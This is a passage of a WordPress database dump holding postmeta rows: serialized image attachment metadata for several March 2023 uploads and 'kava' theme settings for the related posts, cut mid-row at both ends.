289,'_last_editor_used_jetpack','block-editor'),(35878,5290,'_wp_attached_file','2023/03/332471554_1811021212606400_7499125381429830863_n.jpg'),(35879,5290,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:60:\"2023/03/332471554_1811021212606400_7499125381429830863_n.jpg\";s:8:\"filesize\";i:264787;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:60:\"332471554_1811021212606400_7499125381429830863_n-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18425;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:60:\"332471554_1811021212606400_7499125381429830863_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9289;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:60:\"332471554_1811021212606400_7499125381429830863_n-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88735;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:60:\"332471554_1811021212606400_7499125381429830863_n-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35884;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:59:\"332471554_1811021212606400_7499125381429830863_n-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6363;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:60:\"332471554_1811021212606400_7499125381429830863_n-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19109;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:60:\"332471554_1811021212606400_7499125381429830863_n-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45980;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:60:\"332471554_1811021212606400_7499125381429830863_n-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49189;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:60:\"332471554_1811021212606400_7499125381429830863_n-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:71429;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:60:\"332471554_1811021212606400_7499125381429830863_n-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:59532;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:60:\"332471554_1811021212606400_7499125381429830863_n-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:96199;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(35882,5289,'_wp_old_date','2023-03-22'),(35883,5289,'_thumbnail_id','5290'),(35884,5289,'_edit_last','42'),(35885,5289,'kava_extra_enable_breadcrumbs','inherit'),(35886,5289,'post_formats',''),(35887,5289,'gallery_tab',''),(35888,5289,'kava_extra_gallery_images',''),(35889,5289,'link_tab',''),(35890,5289,'kava_extra_link',''),(35891,5289,'kava_extra_link_target','_blank'),(35892,5289,'quote_tab',''),(35893,5289,'kava_extra_quote_text',''),(35894,5289,'kava_extra_quote_cite',''),(35895,5289,'audio_tab',''),(35896,5289,'kava_extra_audio',''),(35897,5289,'kava_extra_audio_loop','false'),(35898,5289,'kava_extra_audio_autoplay','false'),(35899,5289,'kava_extra_audio_preload','false'),(35900,5289,'video_tab',''),(35901,5289,'kava_extra_video_type','library'),(35902,5289,'kava_extra_video_library',''),(35903,5289,'kava_extra_video_external',''),(35904,5289,'kava_extra_video_poster',''),(35905,5289,'kava_extra_video_width','770'),(35906,5289,'kava_extra_video_height','480'),(35907,5289,'kava_extra_video_loop','false'),(35908,5289,'kava_extra_video_autoplay','false'),(35909,5289,'kava_extra_video_preload','false'),(35910,5292,'_edit_lock','1679482203:42'),(35911,5292,'_last_editor_used_jetpack','block-editor'),(35912,5293,'_wp_attached_file','2023/03/332310701_2022485421288162_3265954970292180833_n.jpg'),(35913,5293,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:60:\"2023/03/332310701_2022485421288162_3265954970292180833_n.jpg\";s:8:\"filesize\";i:207041;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:60:\"332310701_2022485421288162_3265954970292180833_n-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14301;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:60:\"332310701_2022485421288162_3265954970292180833_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9249;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:60:\"332310701_2022485421288162_3265954970292180833_n-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67966;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:60:\"332310701_2022485421288162_3265954970292180833_n-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34523;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:59:\"332310701_2022485421288162_3265954970292180833_n-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5518;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:60:\"332310701_2022485421288162_3265954970292180833_n-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18972;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:60:\"332310701_2022485421288162_3265954970292180833_n-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:46603;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:60:\"332310701_2022485421288162_3265954970292180833_n-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:50061;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:60:\"332310701_2022485421288162_3265954970292180833_n-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:71835;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:60:\"332310701_2022485421288162_3265954970292180833_n-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45562;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:60:\"332310701_2022485421288162_3265954970292180833_n-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:101529;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(35916,5292,'_wp_old_date','2023-03-22'),(35917,5292,'_thumbnail_id','5293'),(35918,5292,'_edit_last','42'),(35919,5292,'kava_extra_enable_breadcrumbs','inherit'),(35920,5292,'post_formats',''),(35921,5292,'gallery_tab',''),(35922,5292,'kava_extra_gallery_images',''),(35923,5292,'link_tab',''),(35924,5292,'kava_extra_link',''),(35925,5292,'kava_extra_link_target','_blank'),(35926,5292,'quote_tab',''),(35927,5292,'kava_extra_quote_text',''),(35928,5292,'kava_extra_quote_cite',''),(35929,5292,'audio_tab',''),(35930,5292,'kava_extra_audio',''),(35931,5292,'kava_extra_audio_loop','false'),(35932,5292,'kava_extra_audio_autoplay','false'),(35933,5292,'kava_extra_audio_preload','false'),(35934,5292,'video_tab',''),(35935,5292,'kava_extra_video_type','library'),(35936,5292,'kava_extra_video_library',''),(35937,5292,'kava_extra_video_external',''),(35938,5292,'kava_extra_video_poster',''),(35939,5292,'kava_extra_video_width','770'),(35940,5292,'kava_extra_video_height','480'),(35941,5292,'kava_extra_video_loop','false'),(35942,5292,'kava_extra_video_autoplay','false'),(35943,5292,'kava_extra_video_preload','false'),(35944,5295,'_edit_lock','1679482589:42'),(35945,5295,'_last_editor_used_jetpack','block-editor'),(35946,5296,'_wp_attached_file','2023/03/334937542_1212636702726537_3363107298960902255_n.jpg'),(35947,5296,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:1008;s:4:\"file\";s:60:\"2023/03/334937542_1212636702726537_3363107298960902255_n.jpg\";s:8:\"filesize\";i:439714;s:5:\"sizes\";a:15:{s:6:\"medium\";a:5:{s:4:\"file\";s:60:\"334937542_1212636702726537_3363107298960902255_n-300x189.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28630;}s:5:\"large\";a:5:{s:4:\"file\";s:61:\"334937542_1212636702726537_3363107298960902255_n-1024x645.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:645;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:242686;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:60:\"334937542_1212636702726537_3363107298960902255_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12069;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:60:\"334937542_1212636702726537_3363107298960902255_n-768x484.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:484;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:150654;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:61:\"334937542_1212636702726537_3363107298960902255_n-1536x968.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:968;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:452667;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:60:\"334937542_1212636702726537_3363107298960902255_n-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:46448;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:59:\"334937542_1212636702726537_3363107298960902255_n-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8006;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:60:\"334937542_1212636702726537_3363107298960902255_n-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25866;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:60:\"334937542_1212636702726537_3363107298960902255_n-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:68546;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:60:\"334937542_1212636702726537_3363107298960902255_n-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:76152;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:60:\"334937542_1212636702726537_3363107298960902255_n-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:107204;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:61:\"334937542_1212636702726537_3363107298960902255_n-1170x650.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:271822;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:60:\"334937542_1212636702726537_3363107298960902255_n-600x378.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:378;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:99211;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:60:\"334937542_1212636702726537_3363107298960902255_n-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:153552;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:61:\"334937542_1212636702726537_3363107298960902255_n-1280x640.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:281988;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(35950,5295,'_wp_old_date','2023-03-22'),(35951,5295,'_thumbnail_id','5296'),(35952,5295,'_edit_last','42'),(35953,5295,'kava_extra_enable_breadcrumbs','inherit'),(35954,5295,'post_formats',''),(35955,5295,'gallery_tab',''),(35956,5295,'kava_extra_gallery_images',''),(35957,5295,'link_tab',''),(35958,5295,'kava_extra_link',''),(35959,5295,'kava_extra_link_target','_blank'),(35960,5295,'quote_tab',''),(35961,5295,'kava_extra_quote_text',''),(35962,5295,'kava_extra_quote_cite',''),(35963,5295,'audio_tab',''),(35964,5295,'kava_extra_audio',''),(35965,5295,'kava_extra_audio_loop','false'),(35966,5295,'kava_extra_audio_autoplay','false'),(35967,5295,'kava_extra_audio_preload','false'),(35968,5295,'video_tab',''),(35969,5295,'kava_extra_video_type','library'),(35970,5295,'kava_extra_video_library',''),(35971,5295,'kava_extra_video_external',''),(35972,5295,'kava_extra_video_poster',''),(35973,5295,'kava_extra_video_width','770'),(35974,5295,'kava_extra_video_height','480'),(35975,5295,'kava_extra_video_loop','false'),(35976,5295,'kava_extra_video_autoplay','false'),(35977,5295,'kava_extra_video_preload','false'),(35978,5298,'_edit_lock','1679483322:42'),(35979,5298,'_last_editor_used_jetpack','block-editor'),(35980,5299,'_wp_attached_file','2023/03/ED.jpg'),(35981,5299,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:14:\"2023/03/ED.jpg\";s:8:\"filesize\";i:157920;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:14:\"ED-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12344;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:14:\"ED-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7648;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:14:\"ED-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:52101;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:14:\"ED-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23738;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:13:\"ED-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4895;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:14:\"ED-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14628;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:14:\"ED-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33908;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:14:\"ED-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38151;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:14:\"ED-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:48843;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:14:\"ED-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35463;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:14:\"ED-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:64697;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(35984,5298,'_wp_old_date','2023-03-22'),(35985,5298,'_thumbnail_id','5299'),(35986,5298,'_edit_last','42'),(35987,5298,'kava_extra_enable_breadcrumbs','inherit'),(35988,5298,'post_formats',''),(35989,5298,'gallery_tab',''),(35990,5298,'kava_extra_gallery_images',''),(35991,5298,'link_tab',''),(35992,5298,'kava_extra_link',''),(35993,5298,'kava_extra_link_target','_blank'),(35994,5298,'quote_tab',''),(35995,5298,'kava_extra_quote_text',''),(35996,5298,'kava_extra_quote_cite',''),(35997,5298,'audio_tab',''),(35998,5298,'kava_extra_audio',''),(35999,5298,'kava_extra_audio_loop','false'),(36000,5298,'kava_extra_audio_autoplay','false'),(36001,5298,'kava_extra_audio_preload','false'),(36002,5298,'video_tab',''),(36003,5298,'kava_extra_video_type','library'),(36004,5298,'kava_extra_video_library',''),(36005,5298,'kava_extra_video_external',''),(36006,5298,'kava_extra_video_poster',''),(36007,5298,'kava_extra_video_width','770'),(36008,5298,'kava_extra_video_height','480'),(36009,5298,'kava_extra_video_loop','false'),(36010,5298,'kava_extra_video_autoplay','false'),(36011,5298,'kava_extra_video_preload','false'),(36012,5301,'_edit_lock','1679569015:42'),(36013,5301,'_last_editor_used_jetpack','block-editor'),(36014,5302,'_wp_attached_file','2023/03/mgcsp.jpg'),(36015,5302,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:17:\"2023/03/mgcsp.jpg\";s:8:\"filesize\";i:134286;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"mgcsp-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13149;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"mgcsp-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7213;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"mgcsp-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47422;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:17:\"mgcsp-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21284;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:16:\"mgcsp-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5351;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:17:\"mgcsp-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13138;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:17:\"mgcsp-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27337;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:17:\"mgcsp-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28363;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:17:\"mgcsp-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38953;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:17:\"mgcsp-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33912;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:17:\"mgcsp-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49319;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(36018,5301,'_wp_old_date','2023-03-23'),(36019,5301,'_thumbnail_id','5302'),(36020,5301,'_edit_last','42'),(36023,5301,'kava_extra_enable_breadcrumbs','inherit'),(36024,5301,'post_formats',''),(36025,5301,'gallery_tab',''),(36026,5301,'kava_extra_gallery_images',''),(36027,5301,'link_tab',''),(36028,5301,'kava_extra_link',''),(36029,5301,'kava_extra_link_target','_blank'),(36030,5301,'quote_tab',''),(36031,5301,'kava_extra_quote_text',''),(36032,5301,'kava_extra_quote_cite',''),(36033,5301,'audio_tab',''),(36034,5301,'kava_extra_audio',''),(36035,5301,'kava_extra_audio_loop','false'),(36036,5301,'kava_extra_audio_autoplay','false'),(36037,5301,'kava_extra_audio_preload','false'),(36038,5301,'video_tab',''),(36039,5301,'kava_extra_video_type','library'),(36040,5301,'kava_extra_video_library',''),(36041,5301,'kava_extra_video_external',''),(36042,5301,'kava_extra_video_poster',''),(36043,5301,'kava_extra_video_width','770'),(36044,5301,'kava_extra_video_height','480'),(36045,5301,'kava_extra_video_loop','false'),(36046,5301,'kava_extra_video_autoplay','false'),(36047,5301,'kava_extra_video_preload','false'),(36048,5304,'_edit_lock','1679569726:42'),(36049,5304,'_last_editor_used_jetpack','block-editor'),(36050,5305,'_wp_attached_file','2023/03/wilflife.jpg'),(36051,5305,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:20:\"2023/03/wilflife.jpg\";s:8:\"filesize\";i:269418;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"wilflife-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17957;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"wilflife-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9480;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"wilflife-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83791;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"wilflife-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34210;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:19:\"wilflife-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6365;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:20:\"wilflife-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18983;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:20:\"wilflife-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45883;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:20:\"wilflife-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49660;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:20:\"wilflife-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:69601;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:20:\"wilflife-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:55820;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:20:\"wilflife-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:98179;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(36054,5304,'_wp_old_date','2023-03-23'),(36055,5304,'_thumbnail_id','5305'),(36056,5304,'_edit_last','42'),(36057,5304,'kava_extra_enable_breadcrumbs','inherit'),(36058,5304,'post_formats',''),(36059,5304,'gallery_tab',''),(36060,5304,'kava_extra_gallery_images',''),(36061,5304,'link_tab',''),(36062,5304,'kava_extra_link',''),(36063,5304,'kava_extra_link_target','_blank'),(36064,5304,'quote_tab',''),(36065,5304,'kava_extra_quote_text',''),(36066,5304,'kava_extra_quote_cite',''),(36067,5304,'audio_tab',''),(36068,5304,'kava_extra_audio',''),(36069,5304,'kava_extra_audio_loop','false'),(36070,5304,'kava_extra_audio_autoplay','false'),(36071,5304,'kava_extra_audio_preload','false'),(36072,5304,'video_tab',''),(36073,5304,'kava_extra_video_type','library'),(36074,5304,'kava_extra_video_library',''),(36075,5304,'kava_extra_video_external',''),(36076,5304,'kava_extra_video_poster',''